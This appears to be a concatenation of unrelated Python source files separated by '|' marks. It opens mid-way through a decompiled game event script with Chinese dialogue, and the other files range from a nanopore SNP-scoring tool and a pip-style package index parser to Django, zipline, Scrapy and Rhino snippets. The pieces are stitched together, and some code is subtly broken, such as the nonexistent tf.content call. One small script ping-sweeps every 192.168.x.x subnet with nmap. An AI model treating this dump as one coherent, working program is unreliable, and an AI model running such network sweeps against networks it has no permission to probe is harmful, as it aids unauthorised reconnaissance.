"啪啪几下就可以更换好导力引擎了呢~\x02",
)
)
CloseMessageWindow()
TurnDirection(0x8, 0x107, 400)
ChrTalk(
0x8,
"啊,拜托了。\x02",
)
CloseMessageWindow()
TurnDirection(0x9, 0x107, 400)
ChrTalk(
0x9,
"多谢你帮忙了,小姑娘。\x02",
)
CloseMessageWindow()
def lambda_1FBB():
OP_8E(0x9, 0xFFFFB4A6, 0xFFFFFFE2, 0xFFFF5E98, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_1FBB)
OP_43(0x8, 0x1, 0x1, 0x14)
SetChrFlags(0x107, 0x40)
OP_8E(0x107, 0xFFFFBAD2, 0x14, 0xFFFF6AC8, 0x5DC, 0x0)
FadeToDark(1000, 0, -1)
OP_8E(0x107, 0xFFFFB596, 0x1E, 0xFFFF606E, 0x5DC, 0x0)
WaitChrThread(0x8, 0x1)
WaitChrThread(0x9, 0x1)
OP_0D()
OP_6D(-18190, 10, -40240, 0)
SetChrPos(0x107, -17490, 10, -39610, 182)
SetChrPos(0x8, -19060, -10, -40450, 145)
SetChrChipByIndex(0x9, 14)
OP_6B(3000, 0)
OP_6C(276000, 0)
SetChrPos(0x10, -17420, -20, -41550, 51)
SetChrFlags(0x10, 0x40)
OP_A1(0x10, 0x0)
OP_72(0x0, 0x4)
OP_72(0x0, 0x2)
OP_71(0x0, 0x400)
OP_71(0x0, 0x40)
Sleep(1)
ClearChrFlags(0x9, 0x4)
SetChrFlags(0x9, 0x40)
SetChrBattleFlags(0x9, 0x20)
OP_89(0x9, -17120, 440, -41360, 51)
SetChrFlags(0x9, 0x20)
LoadEffect(0x0, "map\\\\mp024_00.eff")
TurnDirection(0x101, 0x9, 0)
Sleep(400)
FadeToBright(1000, 0)
OP_0D()
Sleep(400)
ChrTalk(
0x107,
"#060F#4P……这样就可以了。\x02",
)
CloseMessageWindow()
OP_94(0x1, 0x107, 0xB4, 0x5DC, 0x7D0, 0x0)
ChrTalk(
0x9,
(
"……那么,\x01",
"动起来了哦。\x02",
)
)
CloseMessageWindow()
Sleep(100)
OP_22(0x9D, 0x0, 0x64)
Sleep(400)
OP_22(0xCF, 0x1, 0x55)
ChrTalk(
0x107,
(
"#062F#4P……………………\x02\x03",
"#060F#4P……嗯,没问题了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"呼~\x01",
"这下总算可以把货物运送过去了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"真不愧是\x01",
"拉赛尔博士的孙女啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"虽然还在上主日学校的年纪,\x01",
"维修的能力却是顶呱呱哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
"#067F#4P嘿嘿……\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
"好了,我们该出发了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
"你们也要注意安全。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F#2P嗯,我们会的。\x02",
)
CloseMessageWindow()
TurnDirection(0x8, 0x101, 400)
ChrTalk(
0x8,
(
"那么就再见了,\x01",
"今天多亏了你们的帮忙。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F#2P路上小心。\x02",
)
CloseMessageWindow()
def lambda_2301():
label("loc_2301")
TurnDirection(0xFE, 0x9, 400)
OP_48()
Jump("loc_2301")
QueueWorkItem2(0x0, 1, lambda_2301)
def lambda_2312():
label("loc_2312")
TurnDirection(0xFE, 0x9, 400)
OP_48()
Jump("loc_2312")
QueueWorkItem2(0x1, 1, lambda_2312)
def lambda_2323():
label("loc_2323")
TurnDirection(0xFE, 0x9, 400)
OP_48()
Jump("loc_2323")
QueueWorkItem2(0x2, 1, lambda_2323)
OP_8C(0x8, 51, 400)
SetChrFlags(0x8, 0x40)
OP_71(0x0, 0x20)
OP_6F(0x0, 40)
OP_70(0x0, 0xC8)
def lambda_2353():
OP_6D(-14070, -40, -37570, 3000)
ExitThread()
QueueWorkItem(0x10, 3, lambda_2353)
OP_24(0xCF, 0x64)
def lambda_236F():
OP_94(0x1, 0x10, 0x0, 0x4650, 0x6A4, 0x0)
ExitThread()
QueueWorkItem(0x10, 1, lambda_236F)
PlayEffect(0x0, 0x0, 0x10, 0, 200, -7000, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x0, 0x1, 0x10, 0, 200, -4000, 0, 0, 0, 1000, 500, 500, 0xFF, 0, 0, 0, 0)
OP_8E(0x8, 0xFFFFBBAE, 0xA, 0xFFFF6546, 0x6A4, 0x0)
OP_8C(0x8, 51, 0)
def lambda_240A():
OP_94(0x1, 0x8, 0x0, 0x4E20, 0x6A4, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_240A)
WaitChrThread(0x10, 0x3)
Sleep(1000)
def lambda_242A():
OP_69(0x101, 0xBB8)
ExitThread()
QueueWorkItem(0x10, 3, lambda_242A)
OP_43(0x0, 0x3, 0x1, 0x16)
WaitChrThread(0x10, 0x1)
OP_44(0x8, 0xFF)
OP_44(0x9, 0xFF)
OP_82(0x0, 0x2)
OP_82(0x1, 0x2)
OP_72(0x0, 0x20)
OP_3F(0x346, 1)
OP_28(0x29, 0x1, 0x40)
OP_28(0x29, 0x4, 0x10)
SetChrFlags(0x8, 0x80)
SetChrFlags(0x9, 0x80)
SetChrFlags(0x10, 0x80)
OP_71(0x0, 0x4)
WaitChrThread(0x10, 0x3)
WaitChrThread(0x0, 0x3)
OP_44(0x0, 0xFF)
OP_44(0x1, 0xFF)
OP_44(0x2, 0xFF)
OP_22(0x17, 0x0, 0x64)
FadeToDark(300, 0, 100)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x2),
"任务【修理运输车】\x07\x00",
"完成!\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
SetMessageWindowPos(72, 320, 56, 3)
EventEnd(0x0)
Return()
# Function_3_1CD1 end
def Function_4_24EF(): pass
label("Function_4_24EF")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_4_24EF end
def Function_5_2504(): pass
label("Function_5_2504")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_5_2504 end
def Function_6_2519(): pass
label("Function_6_2519")
OP_94(0x1, 0xFE, 0x0, 0x5DC, 0x7D0, 0x0)
OP_4A(0xFE, 0)
SetChrSubChip(0xFE, 4)
OP_96(0xFE, 0xFFFF9F3E, 0x3C, 0xFFFF5D80, 0x320, 0x3E8)
OP_4B(0xFE, 0)
OP_94(0x1, 0xFE, 0x0, 0xC8, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_6_2519 end
def Function_7_2561(): pass
label("Function_7_2561")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_7_2561 end
def Function_8_2576(): pass
label("Function_8_2576")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_8_2576 end
def Function_9_258B(): pass
label("Function_9_258B")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_9_258B end
def Function_10_25A0(): pass
label("Function_10_25A0")
SetChrFlags(0xFE, 0x40)
OP_8E(0xFE, 0xFFFFC16C, 0xA, 0xFFFF531C, 0x1388, 0x0)
def lambda_25BF():
label("loc_25BF")
TurnDirection(0xFE, 0x9, 0)
OP_48()
Jump("loc_25BF")
QueueWorkItem2(0xFE, 2, lambda_25BF)
OP_8F(0xFE, 0xFFFFCA04, 0xFFFFFFD8, 0xFFFF6816, 0x1388, 0x0)
SetChrChipByIndex(0xFE, 7)
OP_44(0xFE, 0x2)
Return()
# Function_10_25A0 end
def Function_11_25E8(): pass
label("Function_11_25E8")
SetChrFlags(0xFE, 0x40)
OP_8E(0xFE, 0xFFFFC16C, 0xA, 0xFFFF531C, 0x1388, 0x0)
def lambda_2607():
label("loc_2607")
TurnDirection(0xFE, 0x9, 0)
OP_48()
Jump("loc_2607")
QueueWorkItem2(0xFE, 2, lambda_2607)
OP_8F(0xFE, 0xFFFFC932, 0xFFFFFFA6, 0xFFFF5F2E, 0x1388, 0x0)
SetChrChipByIndex(0xFE, 7)
OP_44(0xFE, 0x2)
Return()
# Function_11_25E8 end
def Function_12_2630(): pass
label("Function_12_2630")
SetChrFlags(0xFE, 0x40)
OP_8E(0xFE, 0xFFFFC16C, 0xA, 0xFFFF531C, 0x1388, 0x0)
def lambda_264F():
label("loc_264F")
TurnDirection(0xFE, 0x9, 0)
OP_48()
Jump("loc_264F")
QueueWorkItem2(0xFE, 2, lambda_264F)
OP_8F(0xFE, 0xFFFFC360, 0xFFFFFFC4, 0xFFFF5A2E, 0x1388, 0x0)
SetChrChipByIndex(0xFE, 7)
OP_44(0xFE, 0x2)
Return()
# Function_12_2630 end
def Function_13_2678(): pass
label("Function_13_2678")
OP_8C(0x8, 225, 0)
OP_44(0x8, 0x0)
SetChrChipByIndex(0x8, 11)
OP_22(0x1F5, 0x0, 0x64)
OP_99(0x8, 0x0, 0x3, 0xBB8)
Sleep(200)
OP_99(0x8, 0x4, 0x7, 0xBB8)
OP_95(0x9, 0x0, 0x0, 0x0, 0x320, 0x2EE0)
Return()
# Function_13_2678 end
def Function_14_26BC(): pass
label("Function_14_26BC")
OP_8E(0xFE, 0xFFFFBAD2, 0x1E, 0xFFFF65D2, 0x1388, 0x0)
def lambda_26D6():
label("loc_26D6")
TurnDirection(0xFE, 0x12, 0)
OP_48()
Jump("loc_26D6")
QueueWorkItem2(0xFE, 2, lambda_26D6)
OP_8F(0xFE, 0xFFFFC02C, 0xFFFFFFEC, 0xFFFF67DA, 0x1388, 0x0)
OP_44(0xFE, 0x2)
Return()
# Function_14_26BC end
def Function_15_26FA(): pass
label("Function_15_26FA")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_273E")
OP_8C(0xFE, 45, 1000)
OP_8C(0xFE, 90, 1000)
OP_8C(0xFE, 135, 1000)
OP_8C(0xFE, 180, 1000)
OP_8C(0xFE, 225, 1000)
OP_8C(0xFE, 270, 1000)
OP_8C(0xFE, 315, 1000)
OP_8C(0xFE, 360, 1000)
Jump("Function_15_26FA")
label("loc_273E")
Return()
# Function_15_26FA end
def Function_16_273F(): pass
label("Function_16_273F")
OP_8F(0x14, 0xFFFFA358, 0xC8, 0xFFFF5088, 0x1F40, 0x0)
PlayEffect(0x12, 0xFF, 0xFF, -23720, 30, -44920, 0, 0, 0, 2000, 2000, 2000, 0xFF, 0, 0, 0, 0)
OP_22(0x20B, 0x0, 0x5F)
def lambda_2793():
OP_9F(0x14, 0xFF, 0xFF, 0xFF, 0x0, 0x190)
ExitThread()
QueueWorkItem(0x14, 1, lambda_2793)
OP_96(0x14, 0xFFFF9EA8, 0xC8, 0xFFFF5092, 0x1F4, 0xFA0)
OP_96(0x14, 0xFFFF9AAC, 0xC8, 0xFFFF4D0E, 0x1F4, 0x7D0)
Return()
# Function_16_273F end
def Function_17_27CE(): pass
label("Function_17_27CE")
OP_8E(0x102, 0xFFFFB2B2, 0x14, 0xFFFF65FA, 0x3E8, 0x0)
TurnDirection(0xFE, 0x8, 400)
Return()
# Function_17_27CE end
def Function_18_27EA(): pass
label("Function_18_27EA")
SetChrFlags(0xFE, 0x40)
OP_8E(0x8, 0xFFFFB58C, 0xFFFFFFF6, 0xFFFF61FE, 0x7D0, 0x0)
OP_8C(0x8, 145, 400)
ClearChrFlags(0xFE, 0x40)
Return()
# Function_18_27EA end
def Function_19_2810(): pass
label("Function_19_2810")
SetChrFlags(0xFE, 0x40)
OP_8E(0x9, 0xFFFFBBAE, 0xA, 0xFFFF6546, 0x7D0, 0x0)
OP_8C(0x9, 182, 400)
ClearChrFlags(0xFE, 0x40)
Return()
# Function_19_2810 end
def Function_20_2836(): pass
label("Function_20_2836")
OP_8E(0x8, 0xFFFFAE34, 0xFFFFFFCE, 0xFFFF6334, 0xBB8, 0x0)
OP_8C(0x8, 135, 400)
Return()
# Function_20_2836 end
def Function_21_2852(): pass
label("Function_21_2852")
OP_94(0x1, 0xFE, 0x5A, 0x64, 0xBB8, 0x0)
OP_94(0x1, 0xFE, 0x10E, 0x64, 0xBB8, 0x0)
OP_94(0x1, 0xFE, 0x5A, 0x64, 0xBB8, 0x0)
OP_94(0x1, 0xFE, 0x10E, 0x64, 0xBB8, 0x0)
Return()
# Function_21_2852 end
def Function_22_288F(): pass
label("Function_22_288F")
Sleep(4000)
OP_24(0xCF, 0x5F)
Sleep(100)
OP_24(0xCF, 0x5A)
Sleep(100)
OP_24(0xCF, 0x55)
Sleep(100)
OP_24(0xCF, 0x50)
Sleep(100)
OP_24(0xCF, 0x4B)
Sleep(100)
OP_24(0xCF, 0x46)
Sleep(100)
OP_24(0xCF, 0x41)
Sleep(100)
OP_24(0xCF, 0x3C)
Sleep(100)
OP_24(0xCF, 0x37)
Sleep(100)
OP_23(0xCF)
Return()
# Function_22_288F end
SaveToFile()
Try(main)
|
import h5py
import numpy as np
import sys
import matplotlib
import matplotlib.pyplot as plt
import argparse
from genome import *
from read import *
from bc_read import *
from alphabet import *
from kmer_model import *
from base import *
from model import *
import yaml
import os
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output", help="output file for a posteriori probabilities")
parser.add_argument("-l", "--log_output", help="file for detailed output (including conditional probabilities and base indices)")
parser.add_argument("-p", "--print_worst", help="print worst n candidates")
parser.add_argument("-s", "--show_worst", help="number of worst positions to show (only works with --print_best)")
parser.add_argument("-i", "--independent", help="treat each read independently", action='store_true')
parser.add_argument("-k", "--kmer_model", help="file with kmer model to use", default="tombo")
parser.add_argument("-g", "--group_name", help="name of group in fast5 files containing basecall info", default="Analyses/Basecall_1D_000")
parser.add_argument("-b", "--basecall_only", help="only use basecalled sequence to determine SNPs (ignore signal)", action='store_true')
parser.add_argument("-c", "--configuration", help="config file with reresquiggle parameters", default="default.yaml")
parser.add_argument("-f", "--full_interval", help="compute scores for whole reference instead of just interesting bases", action="store_true")
parser.add_argument("-a", "--around_changes", help="compute scores for all bases between first and last changed base", action="store_true")
parser.add_argument("reference", help="reference fasta file")
parser.add_argument("interesting", help="list of interesting positions in reference")
parser.add_argument("read_basedir", help="base directory of resquiggled fast5 files")
args = parser.parse_args()
if args.independent and args.print_worst:
print("--print_worst doesn't work with --independent")
exit(1)
if args.show_worst and not args.print_worst:
print("--show_worst only works with --print_worst")
exit(1)
kmer_model = None
if args.kmer_model == "tombo":
kmer_model = tombo_kmer_model("data/tombo.DNA.model")
elif args.kmer_model == "picoamp":
kmer_model = picoamp_kmer_model("data/6mer_model.txt")
elif args.kmer_model == "klebs":
kmer_model = tombo_kmer_model("data/klebs2of6.DNA.model")
else:
raise ValueError("Unknown kmer model: {}".format(args.kmer_model))
with open(args.configuration, "r") as f:
config = yaml.load(f)
load_read = None
if args.basecall_only:
model = basecall_model(args.reference, config)
load_read = lambda read_file, kmer_model, group_name : basecalled_read(filename=read_file, kmer_model = kmer_model, basecall_group=group_name)
else:
model = window_model(kmer_model, config = config)
load_read = lambda read_file, kmer_model, group_name : resquiggled_read(filename=read_file, kmer_model = kmer_model)
reference = load_fasta(args.reference)[0].bases
interesting = load_interesting_bases(args.interesting, reference)
if args.full_interval and args.around_changes:
print("Can't use both --aroung_changes and --full_interval")
exit(1)
if args.full_interval:
new_interesting = [None for b in reference]
for b in interesting:
new_interesting[b.id] = b
interesting = new_interesting
for i in range(len(reference)):
if interesting[i] == None:
interesting[i] = interesting_base(i, reference)
elif args.around_changes:
changed = list(filter(lambda b: b.real_value != b.reference_value, interesting))
begin = max(0, min(changed).id - 20)
end = min(len(reference), max(changed).id + 1 + 20)
interesting = [None for i in range(begin, end)]
for b in changed:
interesting[b.id - begin] = b
for i in range(begin, end):
if interesting[i - begin] == None:
interesting[i - begin] = interesting_base(i, reference)
read_files = [os.path.join(args.read_basedir, file) for file in os.listdir(args.read_basedir) if not os.path.isdir(os.path.join(args.read_basedir, file))]
read_files = filter(lambda x : x[-6:] == ".fast5", read_files)
if args.output:
open(args.output, "w").close()
if args.log_output:
open(args.log_output, "w").close()
reads = []
for read_file in read_files:
try:
read = load_read(read_file, kmer_model, args.group_name)
except KeyError:
print('failed to process read {}'.format(read_file))
continue
read.fix_start_in_reference(reference)
if config['tweak_normalization']:
if read.strand == '-':
read.tweak_normalization(reverse_complement(reference), kmer_model)
else:
read.tweak_normalization(reference, kmer_model)
print("[{}, {}){}".format(read.start_in_reference, read.end_in_reference, read.strand))
model.update_probabilities_full(reference, read, interesting)
reads.append(read)
if args.independent:
if args.output:
with open(args.output, "a") as f:
for base in interesting:
base.output(f)
if args.log_output:
with open(args.log_output, "a") as f:
for base in interesting:
base.log_output(f)
for base in interesting:
base.clear_probabilities()
if not args.independent:
for base in interesting:
if base.real_value != base.reference_value:
base.print()
print()
if args.full_interval or args.around_changes:
x, prob, conf, maxconf = [], [], [], []
for b in interesting:
probs = b.get_normalized_probability()
prob.append(1 - probs[inv_alphabet[b.reference_value]])
conf.append(b.log_probability[inv_alphabet[b.reference_value]])
maxconf.append(max(b.log_probability))
x.append(b.id)
fig, ax = plt.subplots()
plt.subplots_adjust(bottom=0.25)
plt.plot(x, prob)
#pl2 = plt.twinx()
#pl2.plot(x, conf)
#pl2.plot(x, maxconf, color = 'red')
for b in interesting:
if b.real_value != b.reference_value:
plt.axvspan(b.id-0.5, b.id+0.5, color='green', alpha=0.5)
from matplotlib.widgets import Slider
axcolor = 'lightgoldenrodyellow'
axpos = plt.axes([0.2, 0.1, 0.65, 0.03], facecolor=axcolor)
spos = Slider(axpos, 'Pos', x[0], x[-1] - 100 + 1)
def update(val):
pos = val
ax.axis([pos, pos + 100, 0, 1])
fig.canvas.draw_idle()
spos.on_changed(update)
plt.show()
if args.print_worst:
by_SNP_prob = []
for base in interesting:
probs = base.get_normalized_probability()
by_SNP_prob.append((1 - probs[inv_alphabet[base.real_value]], base))
by_SNP_prob.sort(reverse=True)
for p, base in by_SNP_prob[:int(args.print_worst)]:
base.print()
if args.show_worst:
for p, base in by_SNP_prob[:int(args.show_worst)]:
for read in reads:
model.show_base(reference, read, base)
if args.output:
with open(args.output, "w") as f:
for base in interesting:
base.output(f)
if args.log_output:
with open(args.log_output, "w") as f:
for base in interesting:
base.log_output(f)
|
import tensorflow as tf
## 定義變數 給予名稱
state = tf.Variable(25, name='counter')
## 定義常數
one = tf.content(30)
new_value = tf.add(state, one)
## 定義分配量
update = tf.assign(state, new_value)
## 初始化變數
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
print(sess.run(update))
|
def str2bool(v):
return v.lower() == "true"
|
"""
문제
N을 입력받은 뒤, 구구단 N단을 출력하는 프로그램을 작성하시오. 출력 형식에 맞춰서 출력하면 된다.
입력
첫째 줄에 N이 주어진다. N은 1보다 크거나 같고, 9보다 작거나 같다.
출력
출력형식과 같게 N*1부터 N*9까지 출력한다.
예제 입력 1
2
예제 출력 1
2 * 1 = 2
2 * 2 = 4
2 * 3 = 6
2 * 4 = 8
2 * 5 = 10
2 * 6 = 12
2 * 7 = 14
2 * 8 = 16
2 * 9 = 18
"""
N=int(input())
for i in range(1,10):
print("%d * %d = %d"%(N,i,N*i)) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import collections
import os
import sys
import re
import html5lib
import packaging.specifiers
import packaging.version
import six
from .endpoints import Endpoint
from .utils import (
WHEEL_EXTENSION, WHEEL_FILENAME_RE,
match_egg_info_version, package_names_match, split_entry_ext,
)
# Taken from distlib.compat (to match pip's implementation).
if sys.version_info < (3, 4):
unescape = six.moves.html_parser.HTMLParser().unescape
else:
from html import unescape
# These parsing helpers are bits and pieces collected from pip's HTMLPage
# and Link implementation.
def _parse_base_url(document, transport_url):
bases = [
x for x in document.findall(".//base")
if x.get("href") is not None
]
if not bases:
return transport_url
parsed_url = bases[0].get("href")
if parsed_url:
return parsed_url
return transport_url
def _parse_version(filename, package_name):
stem, ext = split_entry_ext(filename)
if ext == WHEEL_EXTENSION:
match = WHEEL_FILENAME_RE.match(filename)
if not match:
raise ValueError("invald wheel name {0!r}".format(filename))
wheel_name, vers = match.group("name", "ver")
if not package_names_match(package_name, wheel_name):
raise ValueError("invald wheel {0!r} for package {1!r}".format(
filename, package_name,
))
else:
vers = match_egg_info_version(stem, package_name)
if vers is None:
raise ValueError("invalid filename {0!r}".format(filename))
return packaging.version.parse(vers)
CLEAN_URL_RE = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.IGNORECASE)
HASH_RE = re.compile(r'(sha1|sha224|sha384|sha256|sha512|md5)=([a-f0-9]+)')
def _iter_entries(document, base_url, package_name):
for anchor in document.findall(".//a"):
href = anchor.get("href")
if not href:
continue
try:
version = _parse_version(anchor.text, package_name)
except ValueError:
continue
url = CLEAN_URL_RE.sub(
lambda match: "%{:2x}".format(ord(match.group(0))),
six.moves.urllib_parse.urljoin(base_url, href),
)
split_result = six.moves.urllib_parse.urlsplit(url)
hashes = dict(
match.group(1, 2)
for match in HASH_RE.finditer(split_result.fragment)
)
endpoint = Endpoint.from_url(split_result)
requires_python = packaging.specifiers.SpecifierSet(
unescape(anchor.get("data-requires-python", "")),
)
gpg_sig = unescape(anchor.get("data-gpg-sig", ""))
yield Entry(
package_name, version, endpoint,
hashes, requires_python, gpg_sig,
)
Entry = collections.namedtuple("Entry", [
"name", # Name of the project. Not necessarily canonical?
"version", # packaging.version._BaseVersion.
"endpoint", # Endpoint to get the file.
"hashes", # Mapping of hashes, {hashname: hexdigest}.
"requires_python", # packaging.specifiers.SpecifierSet.
"gpg_sig", # str, maybe empty.
])
"""A downloadable thing in a repository.
This would be an anchor tag in an HTML file, or a file in a directory.
"""
def parse_from_html(html, page_url, package_name):
"""Parse entries from HTML source.
`html` should be valid HTML 5 content. This could be either text, or a
2-tuple of (content, encoding). In the latter case, content would be
binary, and the encoding is passed into html5lib as transport encoding to
guess the document's encoding. The transport encoding can be `None` if
the callee does not have this information.
`package_name` should be the name of the package on this page.
"""
kwargs = {"namespaceHTMLElements": False}
if not isinstance(html, six.string_types):
html, kwargs["transport_encoding"] = html
document = html5lib.parse(html, **kwargs)
base_url = _parse_base_url(document, page_url)
return list(_iter_entries(document, base_url, package_name))
def _entry_from_path(path, package_name):
filename = os.path.basename(path)
try:
version = _parse_version(filename, package_name)
except ValueError:
return None
return Entry(package_name, version, Endpoint(True, path), {}, None, None)
def list_from_paths(paths, root, package_name):
"""Parse entries from a file listing.
`paths` should be a sequence of paths, e.g. from `os.listdir()`. Paths can
be either absolute or relative to `root`.
"""
return [
entry for entry in (
_entry_from_path(os.path.join(root, path), package_name)
for path in paths
)
if entry is not None
]
|
class Sound():
"""docstring for Template"""
def __init__(self):
self.sound_id = 0;
self.user_id = '';
self.longitude = 0;
self.latitude = 0;
self.description = '';
self.tag = '';
class User():
def __init__(self):
self.user_id = '';
self.name = '';
self.photo_id = '';
self.voice_id = '';
|
import os
for i in range(0,255):
add = "192.168."+str(i)+".0-254"
os.system("nmap -sn "+add)
|
__author__ = 'm&g'
import sys
from zipline.api import (
order_target,
order_target_percent,
symbol,
option_symbol,
)
from zipline.assets import (
Equity,
Option,
)
from backtester.models.order import (
PlainOrderModel,
PercentOrderModel,
)
class BaseOrderExecutorModel(object):
"""A Class that executes orders (i.e. trades)
Parameters
----------
self.orders : BaseOrderModel
self.orders must be BaseOrderModel objects.
Returns
-------
Raises
------
See Also
--------
"""
def __init__(self, orders):
self.orders = orders
self._order_func = None
self.success = False
def process_orders(self):
"""Execute the orders.
Parameters
----------
None : None
Returns
-------
self.success : Bool
returns a boolean that is False if an exception was raised when executing orders
Raises
------
See Also
--------
"""
try:
for order in self.orders:
if isinstance(order, PlainOrderModel):
self._order_func = order_target
elif isinstance(order, PercentOrderModel):
self._order_func = order_target_percent
if isinstance(order.security_type, Option):
_symbol_func = option_symbol
elif isinstance(order.security_type, Equity):
_symbol_func = symbol
self._order_func(_symbol_func(order.symbol), order.quantity)
except:
print "Unexpected error while processing orders: ", sys.exc_info()[0]
self.success = False
raise
else:
self.success = True
return self.success
|
#!/usr/bin/python3
from models.state import State
from tests.test_models.test_base_model import TestBaseModel
class TestState(TestBaseModel):
'''
=========================
User tests
=========================
'''
def __init__(self, *args, **kwargs):
'''
Constructor
'''
super().__init__(*args, **kwargs)
self.test_class = State
self.test_name = "State"
def test_state_id(self):
'''
Attribute test
'''
state = self.test_class()
self.assertIsInstance(state.name, str)
|
from scraper.spiders.auto_spider import CarSpider
from scrapy.settings import Settings
from scrapy.crawler import CrawlerProcess
try:
settings = Settings()
settings.setmodule('scraper.settings')
process = CrawlerProcess(settings=settings)
process.crawl(CarSpider)
process.start()
except Exception as e:
print(f'Closed by {e}')
CarSpider.close(reason=e)
|
import rhinoscriptsyntax as rs
a = 0.06 #kukan no futosa
b = 0.5 #haji no futosa
b0 = 1.5 #mannaka no hutosa
c = 0.2 #chotto sita zure
def periods_ofcurve( curve, n ):
domain = rs.CurveDomain( curve )
cpoint_list = [ ]
point0 = rs.EvaluateCurve( curve , domain[0] )
point1 = rs.EvaluateCurve( curve , domain[1] )
#rs.AddPoints( [ point0, point1 ] )
for i in range(n+1):
d = domain[1] * ( i )/ n
point_lower = rs.EvaluateCurve( curve , d-a )
point_upper = rs.EvaluateCurve( curve , d+a )
cpoint_list.append( point_lower )
cpoint_list.append( point_upper )
return cpoint_list
def draw_grid( curve0 ,curve1, n ):
d0 = periods_ofcurve( curve0, n )
d1 = periods_ofcurve( curve1, n )
curves_upper = []
curves_lower = []
for i in range(n+1):
point00 = d0[ 2*i + 1 ]
point01 = d0[ 2*i + 0 ]
point10 = d1[ 2*i + 1 ]
point11 = d1[ 2*i + 0 ]
if i==0:
curve_upper = rs.AddCurve([point00, point10])
#rs.AddCurve([point01, point11])
curves_upper.append(curve_upper)
elif i==n:
#rs.AddCurve([point00, point10])
curve_lower = rs.AddCurve([point11, point01])
curves_lower.append(curve_lower)
else:
curve_upper = rs.AddCurve([point00, point10])
curve_lower = rs.AddCurve([point11, point01])
curves_upper.append(curve_upper)
curves_lower.append(curve_lower)
curves_all = [ curves_upper, curves_lower ]
return curves_all
def draw_hole( grid00, grid01 ):
grids = [ grid00, grid01 ]
points = []
lists = []
for i in grids:
domain = rs.CurveDomain(i)
domains = [ domain[0]+b, domain[1]-b0*b, domain[1]-b ]
lists.append( domains )
for ii in domains:
point = rs.EvaluateCurve( i, ii )
points.append( point )
for i in range(2):
grid = rs.AddCurve( [ points[i*3], points[5-i*3] ] )
domain0 = rs.CurveDomain( grid )
domain1 = domain0[1] - c
point = rs.EvaluateCurve( grid, domain1 )
#rs.AddPoint(point)
rs.AddCurve( [ point, points[i*3+1] ] )
rs.TrimCurve( grids[i], ( lists[i][0], lists[i][1] ) )
rs.TrimCurve( grid, ( domain0[0], domain1 ) )
def draw_holes( curve0, curve1, n):
grids = draw_grid( curve0, curve1, n )
for i in range(n):
draw_hole( grids[0][i], grids[1][i] )
def draw_severaltimes( n ):
x = 1
circle = rs.AddCircle( ( 0, 0, 0 ), 10 )
rs.ObjectColor( circle, ( 255, 0, 0 ), )
while x == 1:
curve0 = rs.GetObject("Select a curve(If you want program to finish, click red circle) ")
if curve0 == circle:
rs.DeleteObject( circle )
break
else:
curve1 = rs.GetObject("Select a curve")
draw_holes( curve0, curve1, n )
draw_severaltimes(15) |
from cl_app.utils import general_error_response
from .models import(Employee, Fmspw)
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import User
from rest_framework.response import Response
from rest_framework import status
# log start
# import logging
# logging.basicConfig(filename='tokcron.log',level=logging.INFO)
# def token_create_job():
# try:
# print("kkk")
# token = Token.objects.filter().delete()
# fmspw_ids = Fmspw.objects.filter(pw_isactive=True,user__is_active=True)
# for f in fmspw_ids:
# if f.user:
# token_cr = Token.objects.create(user = f.user)
# result = {'status': status.HTTP_200_OK,"message":"Token Cron Successful",'error': False}
# return Response(result,status=status.HTTP_200_OK)
# except Exception as e:
# invalid_message = str(e)
# return general_error_response(invalid_message)
|
class Solution:
def removeKdigits(self, num, k):
"""
:type num: str
:type k: int
:rtype: str
"""
# brute force, TLE
# another solution
# maintain a increasing stack
if len(num) == k:
return '0'
stack = []
for n in num:
while len(stack) > 0 and k > 0 and n<stack[-1]:
stack.pop()
k -= 1
stack.append(n)
while k > 0:
stack.pop()
k -= 1
return str(int(''.join(stack)))
print(Solution().removeKdigits("112", 1))
print(Solution().removeKdigits("1432219",3))
print(Solution().removeKdigits("1",1))
|
names = ['admin', 'panda', 'tiger', 'dog', 'cat']
for name in names:
if name == 'admin':
print("Hello admin, would you like to see a status report.")
else:
print("Hello " + name + ", thank you for logging in again.") |
from django.db import models
# Create your models here.
class jrny(models.Model):
start = models.CharField(max_length=100)
destination = models.CharField(max_length=100)
time = models.CharField(max_length=12)
number = models.IntegerField()
date = models.CharField(max_length=12)
def __str__(self):
return self.start
|
import networkx as nx
import numpy as np
from constants import *
from fastdtw import fastdtw
from utils import dist, compressed_degree_list, avg_2d_array
from utils import neg_softmax
class RandomWalkerFactory:
def get_random_walker(name, options):
if name == 'node2vec':
assert 'p' in options and 'q' in options, 'Must specify both p and q.'
return Node2VecWalker(p=options['p'], q=options['q'])
if name == 'struc2vec':
assert 'q' in options
